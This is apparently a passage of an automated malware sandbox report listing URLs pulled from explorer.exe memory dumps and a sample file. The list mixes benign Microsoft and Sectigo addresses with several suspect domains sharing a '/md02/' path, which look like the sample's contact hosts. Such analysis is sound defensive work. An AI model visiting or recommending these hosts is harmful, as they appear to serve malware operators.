                                            https://wns.windows.com/eexplorer.exe, 00000006.00000002.4566997976.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075903559.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2137896788.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979328846.00000000099AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                              unknown
                                              http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#Iifpj4i2kC.exefalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.hecxion.xyzReferer:explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                unknown
                                                http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000006.00000003.2980304838.000000000C405000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2140399407.000000000C3E8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000006.00000002.4564447597.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.zbbnp.xyz/md02/explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    unknown
                                                    http://www.hecxion.xyzexplorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      unknown
                                                      http://www.tdshomesolution.com/md02/explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://www.mamasprinkleofjoy.com/md02/explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://www.tdshomesolution.comexplorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://www.barnesassetrecovery.storeReferer:explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              unknown
                                                              http://www.rakring.comexplorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&ocexplorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://www.33mgbet.comReferer:explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      http://www.partymaxclubmen36.click/md02/www.tdshomesolution.comexplorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        http://www.upcyclecharms.comexplorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zIifpj4i2kC.exefalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://android.notify.windows.com/iOSexplorer.exe, 00000006.00000002.4575208679.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2140399407.000000000BFDF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://www.upcyclecharms.comReferer:explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://outlook.comeexplorer.exe, 00000006.00000000.2140399407.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4575546415.000000000C087000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2981043334.000000000C086000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              http://www.zruypj169g.topReferer:explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000006.00000003.3075903559.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2137896788.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979328846.00000000099AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      http://www.zruypj169g.top/md02/www.teplo-invest.comexplorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000006.00000000.2137414570.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4566997976.000000000962B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://www.chiri.lat/md02/explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          http://www.hecxion.xyz/md02/explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://api.msn.com/Iexplorer.exe, 00000006.00000000.2137414570.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4566997976.000000000962B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              http://ocsp.sectigo.com0Iifpj4i2kC.exefalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://www.tdshomesolution.comReferer:explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                http://www.chiri.latexplorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  http://www.barnesassetrecovery.store/md02/explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    http://schemas.microexplorer.exe, 00000006.00000000.2133543860.00000000028A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4565658738.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4565685064.0000000007B60000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://www.onsen1508.comReferer:explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      http://www.rslotrank.win/md02/explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        http://www.mamasprinkleofjoy.com/md02/www.rakring.comexplorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0Iifpj4i2kC.exefalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://www.chiri.lat/md02/www.rslotrank.winexplorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            http://www.33mgbet.com/md02/www.a1b5v.xyzexplorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              http://www.a1b5v.xyzReferer:explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-hexplorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564447597.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-quexplorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    http://www.upcyclecharms.com/md02/explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      http://www.partymaxclubmen36.clickexplorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        https://sectigo.com/CPS0Iifpj4i2kC.exefalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        http://www.zruypj169g.topexplorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhzexplorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://excel.office.com-explorer.exe, 00000006.00000000.2140399407.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4575546415.000000000C087000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2981043334.000000000C086000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              http://www.partymaxclubmen36.click/md02/explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svgexplorer.exe, 00000006.00000002.4564447597.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-darkexplorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AAexplorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-cexplorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        http://www.onsen1508.comexplorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          http://www.zruypj169g.top/md02/explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reveexplorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              https://powerpoint.office.comEMdexplorer.exe, 00000006.00000002.4575208679.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2140399407.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                http://www.a1b5v.xyz/md02/explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  http://www.barnesassetrecovery.storeexplorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
